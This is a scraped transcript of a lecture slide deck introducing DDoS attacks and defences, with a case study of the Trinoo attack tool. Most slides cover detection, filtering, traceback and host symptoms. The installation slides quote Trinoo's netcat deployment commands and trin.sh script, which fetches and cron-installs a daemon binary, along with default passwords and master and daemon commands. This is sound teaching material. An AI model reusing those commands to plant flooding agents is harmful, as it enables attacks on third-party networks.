An introduction to ddos
Download
1 / 54

An Introduction to DDoS - PowerPoint PPT Presentation


  • 143 Views
  • Uploaded on

An Introduction to DDoS. And the “Trinoo” Attack Tool. Acknowledgement: Ray Lam, Ivan Wong. Outline. Background on DDoS Attack mechanism Ways to defend The attack tool – Trinoo Introduction Attack scenario Symptoms and defense Weaknesses and next evolution. Background on DDoS.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'An Introduction to DDoS' - mira


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
An introduction to ddos

An Introduction to DDoS

And the “Trinoo” Attack Tool

Acknowledgement: Ray Lam, Ivan Wong

Operating System Concepts


Outline
Outline

  • Background on DDoS

    • Attack mechanism

    • Ways to defend

  • The attack tool – Trinoo

    • Introduction

    • Attack scenario

    • Symptoms and defense

    • Weaknesses and next evolution

Operating System Concepts


Background on ddos

Background on DDoS

Attack mechanism

Operating System Concepts


Denial of service
Denial-Of-Service

  • Flooding-based

  • Send packets to victims

    • Network resources

    • System resources

  • Traditional DOS

    • One attacker

  • Distributed DOS

    • Countless attackers

Operating System Concepts


Attack mechanism
Attack Mechanism

A

V

TCP SYN-ACK, TCP RST, ICMP, UDP..

  • Direct Attack

  • Reflector Attack

TCP SYN, ICMP, UDP With R’s Address as source IP address.

R

A

TCP SYN, ICMP, UDP.. With V’s Address as source IP address.

R

TCP SYN-ACK, TCP RST, ICMP, UDP..

V

Operating System Concepts


An introduction to ddos

Attack Architecture

A

A

TCP SYN, ICMP, UDP.. (with V’s address as the source IP addresses)

Masters (handlers)

Masters (handlers)

Agents (Daemons or Zombies)

Agents (Daemons or Zombies)

Reflectors

TCP SYN, ICMP, UDP.. (the source IP addresses are usually spoofed)

TCP SYN-ACK, TCP RST, ICMP, UDP..

V

V

Direct Attack

Reflector Attack

Operating System Concepts


Attack methods
Attack Methods

Operating System Concepts


Backscatter analysis moore et al
BackScatter Analysis (Moore et al.)

  • Measured DOS activity on the Internet.

  • TCP (94+ %)

  • UDP (2 %)

  • ICMP (2 %)

    TCP attacks based mainly on SYN flooding

Operating System Concepts


Background on ddos1

Background on DDoS

Ways to defend

Operating System Concepts


Strategy
Strategy

  • Three lines of defense:

    • Attack prevention- before the attack

    • Attack detection and filtering- during the attack

    • Attack source traceback- during and after the attack

Operating System Concepts


Attack prevention
Attack prevention

  • Protect hosts from installation of masters and agents by attackers

  • Scan hosts for symptoms of agents being installed

  • Monitor network traffic for known message exchanges among attackers, masters, agents

Operating System Concepts


Attack prevention1
Attack prevention

  • Inadequate and hard to deploy

  • Don’t-care users leave security holes

  • ISP and enterprise networks do not have incentives

Operating System Concepts


Attack source traceback
Attack source traceback

  • Identify actual origin of packet

  • Without relying on source IP of packet

  • 2 approaches

    • Routers record info of packets

    • Routers send additional info of packets to destination

Operating System Concepts


Attack source traceback1
Attack source traceback

  • Source traceback cannot stop ongoing DDoS attack

    • Cannot trace origins behind firewalls, NAT (network address translators)

    • More to do for reflector attack (attack packets from legitimate sources)

  • Useful in post-attack law enforcement

Operating System Concepts


Attack detection and filtering
Attack detection and filtering

  • Detection

    • Identify DDoS attack and attack packets

  • Filtering

    • Classify normal and attack packets

    • Drop attack packets

Operating System Concepts


Attack detection and filtering1
Attack detection and filtering

  • Can be done in 4 places

    • Victim’s network

    • Victim’s ISP network

    • Further upstream ISP network

    • Attack source networks

  • Dispersed agents send packets to single victim

  • Like pouring packets from top of funnel

Operating System Concepts


Attack detection and filtering2
Attack detection and filtering

Effectiveness of detection increases

Attack sourcenetworks

Effectiveness of filtering increases

Further upstreamISP networks

Victim’s ISP network

Victim’s network

Victim

Operating System Concepts


Attack detection and filtering3
Attack detection and filtering

  • Detection

    • Easy at victim’s network – large amount of attack packets

    • Difficult at individual agent’s network – small amount of attack packets

  • Filtering

    • Effective at agents’ networks – less likely to drop normal packets

    • Ineffective at victim’s network – more normal packets are dropped

Operating System Concepts


D f at agent s network
D&F at agent’s network

  • Usually cannot detect DDoS attack

  • Can filter attack packets with address spoofed

    • Attack packets in direct attacks

    • Attack packets from agents to reflectors in reflector attacks

  • Ensuring all ISPs to install ingress packet filtering is impossible

Operating System Concepts


D f at victim s network
D&F at victim’s network

  • Detect DDoS attack

    • Unusually high volume of incoming traffic of certain packet types

    • Degraded server and network performance

  • Filtering is ineffective

    • Attack and normal packets have same destination – victim’s IP and port

    • Attack packets have source IP spoofed or come from many different IPs

    • Attack and normal packets indistinguishable

Operating System Concepts


D f at victim s upstream isp
D&F at victim’s upstream ISP

  • Often requested by victim to filter attack packets

  • Alert protocol

    • Victim cannot receive ACK from ISP

    • Requires strong authentication and encryption

  • Filtering ineffective

  • ISP network may also be jammed

Operating System Concepts


D f at further upstream isp
D&F at further upstream ISP

  • Backpressure approach

  • Victim detects DDoS attack

  • Upstream ISPs filter attack packets

Operating System Concepts


The attack tool trinoo

The attack tool – Trinoo

Introduction

Operating System Concepts


Introduction
Introduction

  • Discovered in August 1999

  • Daemons found on Solaris 2.x systems

  • Attack a system in University of Minnesota

  • Victim unusable for 2 days

Operating System Concepts


Attack type
Attack type

  • UDP flooding

  • Default size of UDP packet: 1000 bytes

    • malloc() buffer of this size and send uninitialized content

  • Default period of attack: 120 seconds

  • Destination port: randomly chosen from 0 – 65534

Operating System Concepts


The attack tool trinoo1

The attack tool – Trinoo

Attack scenario

Operating System Concepts


Installation
Installation

  • Hack an account

    • Acts as repository

      • Scanning tools, attack tools, Trinoo daemons, Trinoo maters, etc.

    • Requirements

      • High bandwidth connection

      • Large number of users

      • Little administrative oversight

Operating System Concepts


Installation1
Installation

  • Compromise systems

    • Look for vulnerable systems

      • Unpatched Sun Solaris and Linux

    • Remote buffer overflow exploitation

      • Set up root account

      • Open TCP ports

    • Keep a `friend list`

Operating System Concepts


Installation2
Installation

  • Install daemons

    • Use “netcat” (“nc”) and “trin.sh”

    • netcat

      • Network version of “cat”

    • trin.sh

      • Shell script to set up daemons

./trin.sh | nc 128.aaa.167.217 1524 &

./trin.sh | nc 128.aaa.167.218 1524 &

Operating System Concepts


Installation3
Installation

  • trin.sh

echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"

echo "echo rcp is done moving binary"

echo "chmod +x /usr/sbin/rpc.listen"

echo "echo launching trinoo"

echo "/usr/sbin/rpc.listen"

echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"

echo "crontab cron"

echo "echo launched"

echo "exit"

Operating System Concepts


Architecture
Architecture

Attacker

Direct Attack

Masters (handlers)

Agents (Daemons or Zombies)

Victim

Operating System Concepts


Communication ports
Communication ports

  • Monitor specific ports to detect presence of master, agent

Attacker

Master

Daemon

UDP

Port 31335

TCP

UDP

Port 27444

Port 27665

Operating System Concepts


Password protection
Password protection

  • Password used to prevent administrators or other hackers to take control

  • Encrypted password compiled into master and daemon using crypt()

  • Clear-text password is sent over network – session is not encrypted

  • Received password is encrypted and compared

Operating System Concepts


Password protection1
Password protection

  • Default passwords

    • “l44adsl” – trinoo daemon password

    • “gOrave” – trinoo master server startup

    • “betaalmostdone” – trinoo master remote interface password

    • “killme” – trinoo master password to control “mdie” command

Operating System Concepts


Login to master
Login to master

  • Telnet to port 27665 of the host with master

  • Enter password “betaalmostdone”

  • Warn if others try to connect the master

[root@r2 root]# telnet r1 27665

Trying 192.168.249.201...

Connected to r1.router (192.168.249.201).

Escape character is '^]'.

betaalmostdone

trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

trinoo>

Operating System Concepts


Master and daemon
Master and daemon

  • Communicate by UDP packets

  • Command line format

    • arg1 password arg2

  • Default password is “l44adsl”

  • When daemon starts, it sends “HELLO” to master

  • Master maintains list of daemon

Operating System Concepts


Master commands
Master commands

  • dos IP

    • DoS the IP address specified

    • “aaa l44adsl IP” sent to each daemon

  • mdos <ip1:ip2:ip3>

    • DoS the IPs simultaneously

  • mtimer N

    • Set attack period to N seconds

Operating System Concepts


Master commands1
Master commands

  • bcast

    • List all daemons’ IP

  • mdie password

    • Shutdown all daemons

  • killdead

    • Invite all daemons to send “HELLO” to master

    • Delete all dead daemons from the list

Operating System Concepts


Daemon commands
Daemon commands

  • Not directly used; only used by master to send commands to daemons

  • Consist of 3 letters

    • Avoid exposing the commands by using Unix command “strings” on the binary

Operating System Concepts


Daemon commands1
Daemon commands

  • aaa password IP

    • DoS specified IP

  • bbb password N

    • Set attack period to N seconds

  • rsz password N

    • Set attack packet size to N bytes

Operating System Concepts


The attack tool trinoo2

The attack tool – Trinoo

Symptoms and defense

Operating System Concepts


Symptoms
Symptoms

  • Masters

    • Crontab

    • Friend list

      • …-b

* * * * * /usr/sbin/rpc.listen

# ls -l ... ...-b

-rw------- 1 root root 25 Sep 26 14:46 ...

-rw------- 1 root root 50 Sep 26 14:30 ...-b

Operating System Concepts


Symptoms1
Symptoms

  • Masters (Con’t)

    • Socket status

# netstat -a --inet

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 *:27665 *:* LISTEN

. . .

udp 0 0 *:31335 *:*

. . .

Operating System Concepts


Symptoms2
Symptoms

  • Masters (Con’t)

    • File status

# lsof | egrep ":31335|:27665"

master 1292 root 3u inet 2460 UDP *:31335

master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)

# lsof -p 1292

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

master 1292 root cwd DIR 3,1 1024 14356 /tmp/...

master 1292 root rtd DIR 3,1 1024 2 /

master 1292 root txt REG 3,1 30492 14357 /tmp/.../master

master 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so

master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so

Operating System Concepts


Symptoms3
Symptoms

  • Daemons

    • Socket status

# netstat -a --inet

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

. . .

udp 0 0 *:1024 *:*

udp 0 0 *:27444 *:*

. . .

Operating System Concepts


Symptoms4
Symptoms

  • Daemons (Con’t)

    • File status

# lsof | egrep ":27444"

ns 1316 root 3u inet 2502 UDP *:27444

# lsof -p 1316

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

ns 1316 root cwd DIR 3,1 1024 153694 /tmp/...

ns 1316 root rtd DIR 3,1 1024 2 /

ns 1316 root txt REG 3,1 6156 153711 /tmp/.../ns

ns 1316 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so

ns 1316 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so

ns 1316 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so

Operating System Concepts


Defenses
Defenses

  • Prevent root level compromise

    • Patch systems

    • Set up firewalls

    • Monitor traffics

  • Block abused ports

    • High numbered UDP ports

    • Trade off

      • Also block normal programs using the same ports

Operating System Concepts


The attack tool trinoo3

The attack tool – Trinoo

Weaknesses and next evolution

Operating System Concepts


Weaknesses
Weaknesses

  • Single kind of attack

    • UDP flooding

    • Easily defended by single defense tools

  • Use IP as destination address

    • “Moving target defense” – victim changes IP to avoid attack

Operating System Concepts


Weaknesses1
Weaknesses

  • Password, encrypted password, commands visible in binary images

    • Use Unix command “strings” to obtain- strings master- strings –n3 ns

    • Check if Trinoo found

    • Crack the encrypted passwords

Operating System Concepts


Weaknesses2
Weaknesses

  • Password travels in plain text in network

    • Daemon password frequently sent in master-to-daemon commands

    • Get password by “ngrep”, “tcpdump” which show UDP payload

Operating System Concepts


Uproot a trinoo network
Uproot a Trinoo network

  • Locate a daemon

  • Use “strings” to obtain IPs of masters

  • Contact sites with master installed

  • Those sites check list of daemons

    • By inspecting file “…” or get master login password and use “bcast” command

    • Get “mdie” password

    • Use “mdie” to shut down all daemons

    • “mdie” periodically as daemons restarted by crontab

Operating System Concepts


Next evolution
Next evolution

  • Combination of several attack types

    • SYN flood, UDP flood, ICMP flood…

    • Higher chance of successful attack

  • Stronger encryption of embedded strings, passwords

  • Use encrypted communication channel

  • Communicate by protocol difficult to be detected or blocked, e.g. ICMP

Operating System Concepts


References
References

  • R. Chang, “Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial,” Oct. 2002

  • D. Dittrich, “The DoS Project’s ‘Trinoo’ Distributed Denial of Service Attack Tool,” http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999

Operating System Concepts